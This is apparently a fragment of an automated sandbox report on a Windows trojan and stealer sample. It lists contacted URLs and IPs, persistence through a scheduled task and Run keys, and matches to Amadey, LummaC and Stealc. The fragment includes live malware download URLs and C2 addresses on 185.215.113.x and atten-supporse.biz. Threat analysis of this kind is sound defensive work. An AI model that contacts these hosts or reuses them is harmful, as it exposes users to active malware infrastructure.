                                                                                                                                                                        https://ac.duckduckgo.com/ac/_acquireAutoScrollWakeLockfirefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          http://185.215.113.206/c4becf79229cb002.php/a37df924488.exe, 00000009.00000002.2578174288.0000000001498000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                          unknown
                                                                                                                                                                          https://monitor.firefox.com/aboutfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://account.bellmedia.cfirefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://185.215.113.16/steam/random.exe_skotes.exe, 00000006.00000002.2915523016.00000000006E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: malware
                                                                                                                                                                              unknown
                                                                                                                                                                              https://mail.yahoo.co.jp/compose/?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.inboxfirefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://login.microsoftonline.comfirefox.exe, 00000018.00000003.2733288614.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://developer.mozilla.org/docs/Web/API/Push_API/Using_the_Push_API#Encryptiondocument.requestStofirefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://www.zhihu.com/firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      http://x1.c.lencr.org/0ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        http://x1.i.lencr.org/0ae5cfd188c.exe, 00000007.00000003.2545472204.0000000005628000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2686850969.000000000544A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61AC0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2852168506.000002BA5C4BA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://infra.spec.whatwg.org/#ascii-whitespacefirefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThresholdfirefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://duckduckgo.com/?t=ffab&q=firefox.exe, 00000018.00000002.2881483129.000002BA63435000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allae5cfd188c.exe, 0000000A.00000003.2689925143.0000000005531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://contile.services.mozilla.com/v1/tilesfirefox.exe, 00000018.00000003.2740167016.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2839565999.000002BA5B52F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737097313.000002BA61CB0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C07F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2875505657.000002BA61CAF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://www.amazon.co.uk/firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://monitor.firefox.com/user/preferencesfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://screenshots.firefox.com/firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA5964A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://firefox-source-docs.mozilla.org/remote/Security.htmlfirefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/adfirefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/tracking-content-reportfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://www.wykop.pl/firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://vk.com/firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingTryingfirefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        http://mozilla.org/Ufirefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2889827871.000034BEA5600000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          high
                                                                                                                                                                                                                          https://www.olx.pl/firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                            high
                                                                                                                                                                                                                            http://mozilla.org/#/properties/dnsMaxAnyPriorityThreadsfirefox.exe, 00000018.00000002.2841148791.000002BA5B776000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                              high
                                                                                                                                                                                                                              http://mozilla.org/Zfirefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                https://xhr.spec.whatwg.org/#sync-warningThefirefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                  https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-4firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                    https://tools.ietf.org/html/draft-ietf-httpbis-encryption-encoding-02#section-2firefox.exe, 00000018.00000002.2814321427.000002BA598A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                      https://github.com/google/closure-compiler/issues/3177firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                        http://mozilla.oZfirefox.exe, 00000018.00000002.2889544343.00002AF0BFD00000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                          high
                                                                                                                                                                                                                                          https://www.google.com/complete/firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                            high
                                                                                                                                                                                                                                            https://atten-supporse.biz:443/apiae5cfd188c.exe, 0000000A.00000003.2787137785.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000002.2812159132.0000000000C35000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                              high
                                                                                                                                                                                                                                              https://webextensions.settings.services.mozilla.com/v1firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                high
                                                                                                                                                                                                                                                https://github.com/lit/lit/blob/main/packages/reactive-element/src/decorators/query-all.tsfirefox.exe, 00000018.00000002.2874426589.000002BA61B84000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2725783431.000002BA61B81000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2723839104.000002BA61B81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                  high
                                                                                                                                                                                                                                                  https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integrationfirefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                    high
                                                                                                                                                                                                                                                    https://addons.mozilla.org/%LOCALE%/firefox/firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                                                      high
                                                                                                                                                                                                                                                      https://www.avito.ru/firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                                                        high
                                                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                                        185.215.113.43
                                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                        104.21.48.1
                                                                                                                                                                                                                                                        atten-supporse.bizUnited States
                                                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                                        185.215.113.16
                                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                                                                                                                        34.107.221.82
                                                                                                                                                                                                                                                        prod.detectportal.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        35.244.181.201
                                                                                                                                                                                                                                                        prod.balrog.prod.cloudops.mozgcp.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        34.117.188.166
                                                                                                                                                                                                                                                        prod.ads.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                        139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                                                                                                                        239.255.255.250
                                                                                                                                                                                                                                                        unknownReserved
                                                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                                                        185.215.113.206
                                                                                                                                                                                                                                                        unknownPortugal
                                                                                                                                                                                                                                                        206894WHOLESALECONNECTIONSNLtrue
                                                                                                                                                                                                                                                        142.250.181.68
                                                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        35.190.72.216
                                                                                                                                                                                                                                                        prod.classify-client.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        142.250.181.78
                                                                                                                                                                                                                                                        youtube.comUnited States
                                                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                                                        34.160.144.191
                                                                                                                                                                                                                                                        prod.content-signature-chains.prod.webservices.mozgcp.netUnited States
                                                                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                                                        IP
                                                                                                                                                                                                                                                        192.168.2.4
                                                                                                                                                                                                                                                        127.0.0.1
                                                                                                                                                                                                                                                        Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                                                        Analysis ID:1571971
                                                                                                                                                                                                                                                        Start date and time:2024-12-09 23:07:05 +01:00
                                                                                                                                                                                                                                                        Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                                                        Overall analysis duration:0h 10m 0s
                                                                                                                                                                                                                                                        Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                                        Report type:full
                                                                                                                                                                                                                                                        Cookbook file name:default.jbs
                                                                                                                                                                                                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                                                        Number of analysed new started processes analysed:47
                                                                                                                                                                                                                                                        Number of new started drivers analysed:0
                                                                                                                                                                                                                                                        Number of existing processes analysed:0
                                                                                                                                                                                                                                                        Number of existing drivers analysed:0
                                                                                                                                                                                                                                                        Number of injected processes analysed:0
                                                                                                                                                                                                                                                        Technologies:
                                                                                                                                                                                                                                                        • HCA enabled
                                                                                                                                                                                                                                                        • EGA enabled
                                                                                                                                                                                                                                                        • AMSI enabled
                                                                                                                                                                                                                                                        Analysis Mode:default
                                                                                                                                                                                                                                                        Analysis stop reason:Timeout
                                                                                                                                                                                                                                                        Sample name:file.exe
                                                                                                                                                                                                                                                        Detection:MAL
                                                                                                                                                                                                                                                        Classification:mal100.troj.spyw.evad.winEXE@85/20@28/14
                                                                                                                                                                                                                                                        EGA Information:
                                                                                                                                                                                                                                                        • Successful, ratio: 71.4%
                                                                                                                                                                                                                                                        HCA Information:Failed
                                                                                                                                                                                                                                                        Cookbook Comments:
                                                                                                                                                                                                                                                        • Found application associated with file extension: .exe
                                                                                                                                                                                                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                                                                                                                                        • Excluded IPs from analysis (whitelisted): 217.20.58.98, 192.229.221.95, 216.58.208.227, 23.218.210.69, 173.194.222.84, 172.217.17.46, 2.20.41.214, 4.245.163.56, 13.107.246.63, 23.218.208.109
                                                                                                                                                                                                                                                        • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, aus5.mozilla.org, learn.microsoft.com, e11290.dspg.akamaiedge.net, go.microsoft.com, clients2.google.com, ocsp.digicert.com, redirector.gvt1.com, star-azurefd-prod.trafficmanager.net, learn.microsoft.com.edgekey.net, fs.microsoft.com, accounts.google.com, otelrules.azureedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, detectportal.prod.mozaws.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, e13636.dscb.akamaiedge.net, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, clients.l.google.com, location.services.mozilla.com, wcpstatic.microsoft.com
                                                                                                                                                                                                                                                        • Execution Graph export aborted for target 37df924488.exe, PID 7148 because there are no executed function
                                                                                                                                                                                                                                                        • Execution Graph export aborted for target ae5cfd188c.exe, PID 3512 because there are no executed function
                                                                                                                                                                                                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                                                        • VT rate limit hit for: file.exe
                                                                                                                                                                                                                                                        TimeTypeDescription
                                                                                                                                                                                                                                                        17:09:02API Interceptor971x Sleep call for process: skotes.exe modified
                                                                                                                                                                                                                                                        17:09:16API Interceptor81x Sleep call for process: ae5cfd188c.exe modified
                                                                                                                                                                                                                                                        22:07:57Task SchedulerRun new task: skotes path: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                        22:09:18AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                        22:09:26AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 37df924488.exe C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe
                                                                                                                                                                                                                                                        22:09:35AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 2ada66c192.exe C:\Users\user\AppData\Local\Temp\1013538001\2ada66c192.exe
                                                                                                                                                                                                                                                        22:09:43AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9c2827fca4.exe C:\Users\user\AppData\Local\Temp\1013539001\9c2827fca4.exe
                                                                                                                                                                                                                                                        22:09:51AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run ae5cfd188c.exe C:\Users\user\AppData\Local\Temp\1013536001\ae5cfd188c.exe
                                                                                                                                                                                                                                                        22:09:59AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 37df924488.exe C:\Users\user\AppData\Local\Temp\1013537001\37df924488.exe
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        185.215.113.43file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        8GHb2yuPOk.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, Vidar, XWormBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadeyBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 185.215.113.43/Zu7JuNko/index.php
                                                                                                                                                                                                                                                        104.21.48.1SN500, SN150 Spec.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                        • www.antipromil.site/7ykh/
                                                                                                                                                                                                                                                        185.215.113.16file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/well/random.exe
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/mine/random.exe
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                                                        SJqOoILabX.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                                                        sk0lV4Ccen.exeGet hashmaliciousAmadey, StealcBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                                                                                                                        8GHb2yuPOk.exeGet hashmaliciousAmadey, LummaC StealerBrowse
                                                                                                                                                                                                                                                        • 185.215.113.16/off/def.exe
                                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                        example.orgfile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 93.184.215.14
                                                                                                                                                                                                                                                        ipv4only.arpafile.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 192.0.0.171
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 192.0.0.170
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 192.0.0.170
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 192.0.0.170
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                                                                                                        • 192.0.0.170
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                        • 192.0.0.170
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 192.0.0.170
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 192.0.0.171
                                                                                                                                                                                                                                                        file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                                                                                                                                                        • 192.0.0.170
